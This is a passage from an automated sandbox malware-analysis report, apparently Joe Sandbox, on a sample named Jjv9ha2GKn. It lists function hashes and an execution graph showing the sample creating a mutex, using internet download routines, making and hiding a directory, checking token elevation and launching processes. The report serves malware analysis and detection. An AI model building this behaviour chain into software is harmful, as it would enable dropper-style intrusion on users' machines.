                                                                                                            • Instruction ID: 92897af5dc2a39bca1ded419e3ad5ad215cac7bb5a946acbe63154be4347876c
                                                                                                            • Opcode Fuzzy Hash: dce058757d6393f3515686ae693a6e832b679e686824c81f88f4a16539e8639f
                                                                                                            • Instruction Fuzzy Hash: 5E41E4B4E0520A9FCB44CFAAC5815EEFBF2BF89300F24C56AC409A7254E7749A418B95
                                                                                                            Function 075D02B8 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a41d62f1e1b4c1062e57dd15ff217bfd3e8ab25f995bdfeeb40ecdf36fcb4156
                                                                                                            • Instruction ID: 53d76b1f16fbeaaa588d5d4dd41958b2db4a7e34b86aa8eea2ed45aa61054045
                                                                                                            • Opcode Fuzzy Hash: a41d62f1e1b4c1062e57dd15ff217bfd3e8ab25f995bdfeeb40ecdf36fcb4156
                                                                                                            • Instruction Fuzzy Hash: 1241B4B0E0120ADBCB54CFAAC5815EEFBB2BF89300F14C56AC419A7254E7749A41CB95
                                                                                                            Function 075D0453 Relevance: .1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8ff513d58fa9019b1590f2a2a1cf315818ae1b247845ce6d5dc89bb697e81404
                                                                                                            • Instruction ID: 918124bdabb6a3cd89e5b2993cb224b9327743d7006d1850f8433343d8b373ae
                                                                                                            • Opcode Fuzzy Hash: 8ff513d58fa9019b1590f2a2a1cf315818ae1b247845ce6d5dc89bb697e81404
                                                                                                            • Instruction Fuzzy Hash: F521FE71E057588BEB59CF6BC8406DEFBF3AFC9200F04C0BAC808A6265DB3405458F51
                                                                                                            Function 026F59D8 Relevance: 7.6, Strings: 6, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR]q$LR]q$$]q$$]q$$]q$$]q
                                                                                                            • API String ID: 0-1969043450
                                                                                                            • Opcode ID: 85e8f76c3f72397208ff95cb9803eeda5ac4019400ac3901b3c0fa60ac7290de
                                                                                                            • Instruction ID: d8ef059c5c23a43b6b709f40ea2c708da596fc6d6f3220915165cbac9a36f236
                                                                                                            • Opcode Fuzzy Hash: 85e8f76c3f72397208ff95cb9803eeda5ac4019400ac3901b3c0fa60ac7290de
                                                                                                            • Instruction Fuzzy Hash: ED4106B0D10208DFCB48DFA8C665A5EBBB2FF45700F54C99AC5262B369D734CA45CB92
                                                                                                            Function 026F0FF0 Relevance: 6.5, Strings: 5, Instructions: 260COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR]q$LR]q$$]q$$]q$$]q
                                                                                                            • API String ID: 0-527398971
                                                                                                            • Opcode ID: 51f20d905faec19a1a35b2962dde9f931cad298726a00d68f53c9799b9d32665
                                                                                                            • Instruction ID: 49e879bf30dc6d33d0ef2d7d1ccc0d5fa0b9f678fd607ba19cb534195dc0f73f
                                                                                                            • Opcode Fuzzy Hash: 51f20d905faec19a1a35b2962dde9f931cad298726a00d68f53c9799b9d32665
                                                                                                            • Instruction Fuzzy Hash: 9AB12471E04159CBCF48CF99D580AADB7B2FF89340F1485A6E51AFB754CB34A882CB91
                                                                                                            Function 026F5BC0 Relevance: 6.5, Strings: 5, Instructions: 245COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR]q$LR]q$$]q$$]q$$]q
                                                                                                            • API String ID: 0-527398971
                                                                                                            • Opcode ID: 97ae048449db5b96ab0f6fb7f98619265cf891662e2474bd25b6b1722a5ec000
                                                                                                            • Instruction ID: 18dacea3a5f4513c3d0c86663a15f558e266adc0a30c74785126593e6900eb98
                                                                                                            • Opcode Fuzzy Hash: 97ae048449db5b96ab0f6fb7f98619265cf891662e2474bd25b6b1722a5ec000
                                                                                                            • Instruction Fuzzy Hash: 9CA13574E04119DBCF58CF98C580AADB7B2FF88301FA58566E517AB354D734AC82CB91
                                                                                                            Function 026F5BD0 Relevance: 6.5, Strings: 5, Instructions: 241COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR]q$LR]q$$]q$$]q$$]q
                                                                                                            • API String ID: 0-527398971
                                                                                                            • Opcode ID: 4eac326541e18adb9772e968d846eec4a7d15e4635492c69efb997914ab7e745
                                                                                                            • Instruction ID: 1708e63cfe3cb8bf6205fea2e4ed977bc93c9956c0f0187cb4ad5b8e86893e72
                                                                                                            • Opcode Fuzzy Hash: 4eac326541e18adb9772e968d846eec4a7d15e4635492c69efb997914ab7e745
                                                                                                            • Instruction Fuzzy Hash: 3DA11474A04119DBCF58CF98C580AAEB7B2FF88301FA58566E517AB354D734AC82CB91
                                                                                                            Function 07AFFA88 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$@$B$B$Haq
                                                                                                            • API String ID: 0-1778894865
                                                                                                            • Opcode ID: 177a94098b3f80de98989842e2b90458ff6376b930d53ec0a97bc42b3251e5e4
                                                                                                            • Instruction ID: be706211eaae707cc5ddfb4f0654b3cbc44846bb97529ceba0b4e5c7f8eb8d1a
                                                                                                            • Opcode Fuzzy Hash: 177a94098b3f80de98989842e2b90458ff6376b930d53ec0a97bc42b3251e5e4
                                                                                                            • Instruction Fuzzy Hash: ED51B0B17046068FCB15DFA8C49056EBBF6FFC926071485AAE629CB761DB30DC42CB90
                                                                                                            Function 07AFFA78 Relevance: 5.1, Strings: 4, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$@$B$B
                                                                                                            • API String ID: 0-685577651
                                                                                                            • Opcode ID: ff7a66efa38a70ad912bfb51e4894be13ce5c33ea350d9aa3165140171a1d173
                                                                                                            • Instruction ID: 8ce1980f0f379f866d8d9acceddcbc2ed701b037cfa37458b26a997b8ace88da
                                                                                                            • Opcode Fuzzy Hash: ff7a66efa38a70ad912bfb51e4894be13ce5c33ea350d9aa3165140171a1d173
                                                                                                            • Instruction Fuzzy Hash: 74219FF1A00216CFCB24DFA9C9D49AABBF5FF89610B24416AE215DB231D730DC41CB81
                                                                                                            Function 026FBAE8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                            • API String ID: 0-2351511683
                                                                                                            • Opcode ID: 7c824580947e9e97bdf295cb2d4520de3b7ca1b401215fb0b8824ce157e2b200
                                                                                                            • Instruction ID: 1c2912caf6facb623d53ba8d8ebe604ff0b1d5acbe9788ccfbcea0f2a0608340
                                                                                                            • Opcode Fuzzy Hash: 7c824580947e9e97bdf295cb2d4520de3b7ca1b401215fb0b8824ce157e2b200
                                                                                                            • Instruction Fuzzy Hash: 0501BC317401048F8FA88E2DC580A2573EAEF8CA68725456AE605CB378DF31DC42C785

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.7%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:3%
                                                                                                            Total number of Nodes:1843
                                                                                                            Total number of Limit Nodes:33
                                                                                                            execution_graph 13151 40ef42 13152 40ef4d 13151->13152 13156 40ef5d 13151->13156 13157 40ef63 13152->13157 13155 40dc45 __freea 14 API calls 13155->13156 13158 40ef7e 13157->13158 13159 40ef78 13157->13159 13161 40dc45 __freea 14 API calls 13158->13161 13160 40dc45 __freea 14 API calls 13159->13160 13160->13158 13162 40ef8a 13161->13162 13163 40dc45 __freea 14 API calls 13162->13163 13164 40ef95 13163->13164 13165 40dc45 __freea 14 API calls 13164->13165 13166 40efa0 13165->13166 13167 40dc45 __freea 14 API calls 13166->13167 13168 40efab 13167->13168 13169 40dc45 __freea 14 API calls 13168->13169 13170 40efb6 13169->13170 13171 40dc45 __freea 14 API calls 13170->13171 13172 40efc1 13171->13172 13173 40dc45 __freea 14 API calls 13172->13173 13174 40efcc 13173->13174 13175 40dc45 __freea 14 API calls 13174->13175 13176 40efd7 13175->13176 13177 40dc45 __freea 14 API calls 13176->13177 13178 40efe5 13177->13178 13183 40ed8f 13178->13183 13184 40ed9b ___scrt_is_nonwritable_in_current_image 13183->13184 13199 40f599 EnterCriticalSection 13184->13199 13188 40eda5 13189 40dc45 __freea 14 API calls 13188->13189 13190 40edcf 13188->13190 13189->13190 13200 40edee 13190->13200 13191 40edfa 13192 40ee06 ___scrt_is_nonwritable_in_current_image 13191->13192 13204 40f599 EnterCriticalSection 13192->13204 13194 40ee10 13195 40f030 _unexpected 14 API calls 13194->13195 13196 40ee23 13195->13196 13205 40ee43 13196->13205 13199->13188 13203 40f5e1 LeaveCriticalSection 13200->13203 13202 40eddc 13202->13191 13203->13202 13204->13194 13208 40f5e1 LeaveCriticalSection 13205->13208 13207 40ee31 13207->13155 13208->13207 12231 409673 12234 408488 12231->12234 12235 40849a 12234->12235 12236 4084ac 12234->12236 12235->12236 12237 4084a2 12235->12237 12248 408976 12236->12248 12239 4084aa 12237->12239 12241 408976 CallUnexpected 51 API calls 12237->12241 12242 4084ca 12241->12242 12244 408976 CallUnexpected 51 API calls 12242->12244 12243 408976 CallUnexpected 51 API calls 12243->12239 12245 4084d5 12244->12245 12262 40d761 12245->12262 12268 408984 12248->12268 12250 40897b 12251 4084b1 12250->12251 12282 411788 12250->12282 12251->12239 12251->12243 12254 40d7ad 12256 40d7b7 IsProcessorFeaturePresent 12254->12256 12261 40d7d6 12254->12261 12258 40d7c3 12256->12258 12257 40d0b6 CallUnexpected 21 API calls 12259 40d7e0 12257->12259 12260 40d978 CallUnexpected 8 API calls 12258->12260 12260->12261 12261->12257 12263 40d76d ___scrt_is_nonwritable_in_current_image 12262->12263 12264 40f07b _unexpected 41 API calls 12263->12264 12265 40d772 12264->12265 12266 40d79d CallUnexpected 41 API calls 12265->12266 12267 40d79c 12266->12267 12269 408990 GetLastError 12268->12269 12270 40898d 12268->12270 12312 409b63 12269->12312 12270->12250 12273 4089c4 12274 408a0a SetLastError 12273->12274 12274->12250 12275 409b9e ___vcrt_FlsSetValue 6 API calls 12276 4089be CallUnexpected 12275->12276 12276->12273 12277 4089e6 12276->12277 12278 409b9e ___vcrt_FlsSetValue 6 API calls 12276->12278 12279 409b9e ___vcrt_FlsSetValue 6 API calls 12277->12279 12280 4089fa 12277->12280 12278->12277 12279->12280 12281 40c52b ___std_exception_copy 14 API calls 12280->12281 12281->12273 12317 4116b6 12282->12317 12285 4117cd 12290 4117d9 ___scrt_is_nonwritable_in_current_image 12285->12290 12286 41183b CallUnexpected 12292 411871 CallUnexpected 12286->12292 12328 40f599 EnterCriticalSection 12286->12328 12287 40f1cc ___std_exception_copy 14 API calls 12293 41180a CallUnexpected 12287->12293 12288 411829 12289 40dc32 ___std_exception_copy 14 API calls 12288->12289 12291 41182e 12289->12291 12290->12286 12290->12287 12290->12288 12290->12293 12294 40db74 ___std_exception_copy 41 API calls 12291->12294 12297 4119ab 12292->12297 12298 4118ae 12292->12298 12309 4118dc 12292->12309 12293->12286 12293->12288 12302 411813 12293->12302 12294->12302 12300 4119b6 12297->12300 12333 40f5e1 LeaveCriticalSection 12297->12333 12305 40f07b _unexpected 41 API calls 12298->12305 12298->12309 12301 40d0b6 CallUnexpected 21 API calls 12300->12301 12304 4119be 12301->12304 12302->12254 12307 4118d1 12305->12307 12306 40f07b _unexpected 41 API calls 12310 411931 12306->12310 12308 40f07b _unexpected 41 API calls 12307->12308 12308->12309 12329 411957 12309->12329 12310->12302 12311 40f07b _unexpected 41 API calls 12310->12311 12311->12302 12313 409a02 ___vcrt_FlsFree 5 API calls 12312->12313 12314 409b7d 12313->12314 12315 409b95 TlsGetValue 12314->12315 12316 4089a5 12314->12316 12315->12316 12316->12273 12316->12274 12316->12275 12318 4116c2 ___scrt_is_nonwritable_in_current_image 12317->12318 12323 40f599 EnterCriticalSection 12318->12323 12320 4116d0 12324 411712 12320->12324 12323->12320 12327 40f5e1 LeaveCriticalSection 12324->12327 12326 40d7a2 12326->12254 12326->12285 12327->12326 12328->12292 12330 411923 12329->12330 12331 41195b 12329->12331 12330->12302 12330->12306 12330->12310 12334 40f5e1 LeaveCriticalSection 12331->12334 12333->12300 12334->12330 10700 40727e 10701 40728a ___scrt_is_nonwritable_in_current_image 10700->10701 10726 407596 10701->10726 10703 407291 10704 4073e4 10703->10704 10713 4072bb ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 10703->10713 10777 407884 IsProcessorFeaturePresent 10704->10777 10706 4073eb 10781 40d0f2 10706->10781 10711 4072da 10712 40735b 10737 407999 10712->10737 10713->10711 10713->10712 10759 40d0cc 10713->10759 10715 407361 10741 402710 10715->10741 10721 407381 10722 40738a 10721->10722 10768 40d0a7 10721->10768 10771 407707 10722->10771 10727 40759f 10726->10727 10787 407b48 IsProcessorFeaturePresent 10727->10787 10731 4075b0 10736 4075b4 10731->10736 10797 40d6c0 10731->10797 10734 4075cb 10734->10703 10736->10703 11111 408800 10737->11111 10740 4079bf 10740->10715 11113 401000 10741->11113 10743 402725 10744 402785 10743->10744 10745 402729 CreateMutexW GetLastError 10743->10745 10766 4079cf GetModuleHandleW 10744->10766 10746 402744 10745->10746 10747 40277d ExitProcess 10745->10747 10748 402754 10746->10748 10749 40274b 10746->10749 11131 401420 GetProcessHeap HeapAlloc 10748->11131 11158 4024b0 GetCurrentProcess OpenProcessToken 10749->11158 10754 40278b 11181 402520 6 API calls 10754->11181 10755 402774 11163 401860 10755->11163 10760 40d761 ___scrt_is_nonwritable_in_current_image 10759->10760 10761 40d0e2 _unexpected 10759->10761 11945 40f07b GetLastError 10760->11945 10761->10712 10763 40d79d CallUnexpected 41 API calls 10764 40d79c 10763->10764 10767 40737d 10766->10767 10767->10706 10767->10721 11972 40cf26 10768->11972 10772 407713 10771->10772 10776 407392 10772->10776 12043 40d6d2 10772->12043 10774 407721 10775 4087ab ___scrt_uninitialize_crt 7 API calls 10774->10775 10775->10776 10776->10711 10778 40789a CallUnexpected 10777->10778 10779 407945 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10778->10779 10780 407989 CallUnexpected 10779->10780 10780->10706 10782 40cf26 CallUnexpected 21 API calls 10781->10782 10783 4073f1 10782->10783 10784 40d0b6 10783->10784 10785 40cf26 CallUnexpected 21 API calls 10784->10785 10786 4073f9 10785->10786 10788 4075ab 10787->10788 10789 40878c 10788->10789 10806 409997 10789->10806 10792 408795 10792->10731 10794 40879d 10795 4087a8 10794->10795 10820 4099d3 10794->10820 10795->10731 10860 41161d 10797->10860 10800 4087ab 10801 4087b4 10800->10801 10802 4087be 10800->10802 10803 408a49 ___vcrt_uninitialize_ptd 6 API calls 10801->10803 10802->10736 10804 4087b9 10803->10804 10805 4099d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10804->10805 10805->10802 10807 4099a0 10806->10807 10809 4099c9 10807->10809 10810 408791 10807->10810 10824 409bdc 10807->10824 10811 4099d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10809->10811 10810->10792 10812 408a16 10810->10812 10811->10810 10841 409aed 10812->10841 10816 408a46 10816->10794 10819 408a2b 10819->10794 10821 4099fd 10820->10821 10822 4099de 10820->10822 10821->10792 10823 4099e8 DeleteCriticalSection 10822->10823 10823->10821 10823->10823 10829 409a02 10824->10829 10827 409c14 InitializeCriticalSectionAndSpinCount 10828 409bff 10827->10828 10828->10807 10830 409a23 10829->10830 10831 409a1f 10829->10831 10830->10831 10833 409a8b GetProcAddress 10830->10833 10834 409a7c 10830->10834 10836 409aa2 LoadLibraryExW 10830->10836 10831->10827 10831->10828 10833->10831 10834->10833 10835 409a84 FreeLibrary 10834->10835 10835->10833 10837 409ab9 GetLastError 10836->10837 10838 409ae9 10836->10838 10837->10838 10839 409ac4 ___vcrt_FlsFree 10837->10839 10838->10830 10839->10838 10840 409ada LoadLibraryExW 10839->10840 10840->10830 10842 409a02 ___vcrt_FlsFree 5 API calls 10841->10842 10843 409b07 10842->10843 10844 409b20 TlsAlloc 10843->10844 10845 408a20 10843->10845 10845->10819 10846 409b9e 10845->10846 10847 409a02 ___vcrt_FlsFree 5 API calls 10846->10847 10848 409bb8 10847->10848 10849 409bd3 TlsSetValue 10848->10849 10850 408a39 10848->10850 10849->10850 10850->10816 10851 408a49 10850->10851 10852 408a59 10851->10852 10853 408a53 10851->10853 10852->10819 10855 409b28 10853->10855 10856 409a02 ___vcrt_FlsFree 5 API calls 10855->10856 10857 409b42 10856->10857 10858 409b5a TlsFree 10857->10858 10859 409b4e 10857->10859 10858->10859 10859->10852 10861 41162d 10860->10861 10862 4075bd 10860->10862 10861->10862 10864 40f4cc 10861->10864 10862->10734 10862->10800 10865 40f4d8 ___scrt_is_nonwritable_in_current_image 10864->10865 10876 40f599 EnterCriticalSection 10865->10876 10867 40f4df 10877 410841 10867->10877 10870 40f4fd 10901 40f523 10870->10901 10876->10867 10878 41084d ___scrt_is_nonwritable_in_current_image 10877->10878 10879 410877 10878->10879 10880 410856 10878->10880 10904 40f599 EnterCriticalSection 10879->10904 10912 40dc32 10880->10912 10886 4108af 10917 4108d6 10886->10917 10888 410883 10888->10886 10905 410791 10888->10905 10890 40f366 GetStartupInfoW 10891 40f417 10890->10891 10892 40f383 10890->10892 10896 40f41c 10891->10896 10892->10891 10893 410841 42 API calls 10892->10893 10894 40f3ab 10893->10894 10894->10891 10895 40f3db GetFileType 10894->10895 10895->10894 10900 40f423 10896->10900 10897 40f466 GetStdHandle 10897->10900 10898 40f4c8 10898->10870 10899 40f479 GetFileType 10899->10900 10900->10897 10900->10898 10900->10899 11110 40f5e1 LeaveCriticalSection 10901->11110 10903 40f50e 10903->10861 10904->10888 10920 40d8f2 10905->10920 10907 4107a3 10911 4107b0 10907->10911 10927 411472 10907->10927 10932 40dc45 10911->10932 10965 40f1cc GetLastError 10912->10965 10914 40dc37 10915 40db74 10914->10915 11029 40dac0 10915->11029 11109 40f5e1 LeaveCriticalSection 10917->11109 10919 40f4ee 10919->10870 10919->10890 10926 40d8ff _unexpected 10920->10926 10921 40d93f 10924 40dc32 ___std_exception_copy 13 API calls 10921->10924 10922 40d92a RtlAllocateHeap 10923 40d93d 10922->10923 10922->10926 10923->10907 10924->10923 10926->10921 10926->10922 10938 40c57b 10926->10938 10951 4112ae 10927->10951 10929 41148e 10930 4114ac InitializeCriticalSectionAndSpinCount 10929->10930 10931 411497 10929->10931 10930->10931 10931->10907 10933 40dc50 HeapFree 10932->10933 10937 40dc7a 10932->10937 10934 40dc65 GetLastError 10933->10934 10933->10937 10935 40dc72 __freea 10934->10935 10936 40dc32 ___std_exception_copy 12 API calls 10935->10936 10936->10937 10937->10888 10941 40c5a7 10938->10941 10942 40c5b3 ___scrt_is_nonwritable_in_current_image 10941->10942 10947 40f599 EnterCriticalSection 10942->10947 10944 40c5be CallUnexpected 10948 40c5f5 10944->10948 10947->10944 10949 40f5e1 CallUnexpected LeaveCriticalSection 10948->10949 10950 40c586 10949->10950 10950->10926 10952 4112de 10951->10952 10956 4112da _unexpected 10951->10956 10952->10956 10957 4111e3 10952->10957 10955 4112f8 GetProcAddress 10955->10956 10956->10929 10963 4111f4 ___vcrt_FlsFree 10957->10963 10958 41128a 10958->10955 10958->10956 10959 411212 LoadLibraryExW 10960 411291 10959->10960 10961 41122d GetLastError 10959->10961 10960->10958 10962 4112a3 FreeLibrary 10960->10962 10961->10963 10962->10958 10963->10958 10963->10959 10964 411260 LoadLibraryExW 10963->10964 10964->10960 10964->10963 10966 40f1e2 10965->10966 10967 40f1e8 10965->10967 10988 4113f1 10966->10988 10971 40f1ec SetLastError 10967->10971 10993 411430 10967->10993 10971->10914 10973 40d8f2 _unexpected 12 API calls 10974 40f219 10973->10974 10975 40f221 10974->10975 10976 40f232 10974->10976 10977 411430 _unexpected 6 API calls 10975->10977 10978 411430 _unexpected 6 API calls 10976->10978 10979 40f22f 10977->10979 10980 40f23e 10978->10980 10985 40dc45 __freea 12 API calls 10979->10985 10981 40f242 10980->10981 10982 40f259 10980->10982 10984 411430 _unexpected 6 API calls 10981->10984 10998 40eea9 10982->10998 10984->10979 10985->10971 10987 40dc45 __freea 12 API calls 10987->10971 10989 4112ae _unexpected 5 API calls 10988->10989 10990 41140d 10989->10990 10991 411416 10990->10991 10992 411428 TlsGetValue 10990->10992 10991->10967 10994 4112ae _unexpected 5 API calls 10993->10994 10995 41144c 10994->10995 10996 40f204 10995->10996 10997 41146a TlsSetValue 10995->10997 10996->10971 10996->10973 11003 40ed3d 10998->11003 11004 40ed49 ___scrt_is_nonwritable_in_current_image 11003->11004 11017 40f599 EnterCriticalSection 11004->11017 11006 40ed53 11018 40ed83 11006->11018 11009 40ee4f 11010 40ee5b ___scrt_is_nonwritable_in_current_image 11009->11010 11021 40f599 EnterCriticalSection 11010->11021 11012 40ee65 11022 40f030 11012->11022 11014 40ee7d 11026 40ee9d 11014->11026 11017->11006 11019 40f5e1 CallUnexpected LeaveCriticalSection 11018->11019 11020 40ed71 11019->11020 11020->11009 11021->11012 11023 40f03f _unexpected 11022->11023 11024 40f066 _unexpected 11022->11024 11023->11024 11025 410e92 _unexpected 14 API calls 11023->11025 11024->11014 11025->11024 11027 40f5e1 CallUnexpected LeaveCriticalSection 11026->11027 11028 40ee8b 11027->11028 11028->10987 11030 40dad2 ___std_exception_copy 11029->11030 11035 40daf7 11030->11035 11036 40db07 11035->11036 11037 40db0e 11035->11037 11050 40b610 GetLastError 11036->11050 11042 40daea 11037->11042 11054 40d94f 11037->11054 11040 40db43 11040->11042 11057 40db84 IsProcessorFeaturePresent 11040->11057 11044 40b4a0 11042->11044 11043 40db73 11045 40b4ac 11044->11045 11046 40b4c3 11045->11046 11089 40b660 11045->11089 11048 40b4d6 11046->11048 11049 40b660 ___std_exception_copy 41 API calls 11046->11049 11049->11048 11051 40b629 11050->11051 11061 40f27d 11051->11061 11055 40d973 11054->11055 11056 40d95a GetLastError SetLastError 11054->11056 11055->11040 11056->11040 11058 40db90 11057->11058 11083 40d978 11058->11083 11062 40f290 11061->11062 11065 40f296 11061->11065 11063 4113f1 _unexpected 6 API calls 11062->11063 11063->11065 11064 411430 _unexpected 6 API calls 11066 40f2b0 11064->11066 11065->11064 11067 40b645 SetLastError 11065->11067 11066->11067 11068 40d8f2 _unexpected 14 API calls 11066->11068 11067->11037 11069 40f2c0 11068->11069 11070 40f2c8 11069->11070 11071 40f2dd 11069->11071 11072 411430 _unexpected 6 API calls 11070->11072 11073 411430 _unexpected 6 API calls 11071->11073 11074 40f2d4 11072->11074 11075 40f2e9 11073->11075 11079 40dc45 __freea 14 API calls 11074->11079 11076 40f2fc 11075->11076 11077 40f2ed 11075->11077 11078 40eea9 _unexpected 14 API calls 11076->11078 11080 411430 _unexpected 6 API calls 11077->11080 11081 40f307 11078->11081 11079->11067 11080->11074 11082 40dc45 __freea 14 API calls 11081->11082 11082->11067 11084 40d994 CallUnexpected 11083->11084 11085 40d9c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11084->11085 11088 40da91 CallUnexpected 11085->11088 11086 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11087 40daaf GetCurrentProcess TerminateProcess 11086->11087 11087->11043 11088->11086 11090 40b66e GetLastError 11089->11090 11091 40b6af 11089->11091 11092 40b67d 11090->11092 11091->11046 11093 40f27d ___std_exception_copy 14 API calls 11092->11093 11094 40b69a SetLastError 11093->11094 11094->11091 11095 40b6b6 11094->11095 11098 40d79d 11095->11098 11099 411788 CallUnexpected EnterCriticalSection LeaveCriticalSection 11098->11099 11100 40d7a2 11099->11100 11101 40d7ad 11100->11101 11102 4117cd CallUnexpected 40 API calls 11100->11102 11103 40d7b7 IsProcessorFeaturePresent 11101->11103 11104 40d7d6 11101->11104 11102->11101 11106 40d7c3 11103->11106 11105 40d0b6 CallUnexpected 21 API calls 11104->11105 11107 40d7e0 11105->11107 11108 40d978 CallUnexpected 8 API calls 11106->11108 11108->11104 11109->10919 11110->10903 11112 4079ac GetStartupInfoW 11111->11112 11112->10740 11114 40140f 11113->11114 11117 401022 11113->11117 11114->10743 11115 401053 lstrcmpA 11116 4010b0 GetProcessHeap HeapAlloc 11115->11116 11115->11117 11119 401100 __InternalCxxFrameHandler 11116->11119 11117->11114 11117->11115 11118 4010e4 lstrlenA 11118->11119 11119->11117 11119->11118 11120 401216 GetProcessHeap HeapAlloc 11119->11120 11121 4012c8 GetProcessHeap HeapAlloc 11120->11121 11122 40125d __InternalCxxFrameHandler 11120->11122 11184 409c70 11121->11184 11122->11121 11123 401260 GetProcessHeap HeapAlloc 11122->11123 11123->11122 11125 401305 GetProcessHeap HeapAlloc 11126 409c70 __InternalCxxFrameHandler 11125->11126 11127 401351 GetProcessHeap HeapAlloc 11126->11127 11128 40139d __InternalCxxFrameHandler 11127->11128 11129 401400 __InternalCxxFrameHandler 11128->11129 11130 4013c9 GetProcessHeap HeapAlloc 11128->11130 11129->10743 11130->11129 11132 401847 11131->11132 11156 401479 11131->11156 11322 406f60 11132->11322 11134 40164e lstrcatW 11138 40176d 11134->11138 11135 401854 11135->10747 11135->10755 11140 401775 GetCurrentProcess OpenProcessToken 11138->11140 11141 40183b GetProcessHeap HeapFree 11138->11141 11139 4014a8 Sleep 11142 4014bf 11139->11142 11139->11156 11144 401797 GetTokenInformation CloseHandle 11140->11144 11145 4017c8 11140->11145 11141->11132 11142->11156 11144->11145 11264 401a80 11145->11264 11146 4014d5 ExpandEnvironmentStringsW SHCreateDirectoryExW 11148 401503 SetFileAttributesW 11146->11148 11146->11156 11148->11156 11149 4017d7 CallUnexpected 11150 4017e7 CreateProcessW 11149->11150 11150->11141 11151 401825 CloseHandle CloseHandle 11150->11151 11151->11141 11153 4015ad GetProcessHeap HeapAlloc 11153->11156 11154 406120 27 API calls 11154->11153 11155 401600 GetProcessHeap HeapFree 11155->11156 11156->11134 11156->11139 11156->11148 11156->11153 11156->11154 11156->11155 11186 4025b0 InternetOpenW 11156->11186 11199 406dd0 11156->11199 11212 4069e0 11156->11212 11278 406120 11156->11278 11159 402508 11158->11159 11160 4024dd GetTokenInformation CloseHandle 11158->11160 11161 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11159->11161 11160->11159 11162 402515 11161->11162 11162->10748 11162->10754 11164 4025b0 18 API calls 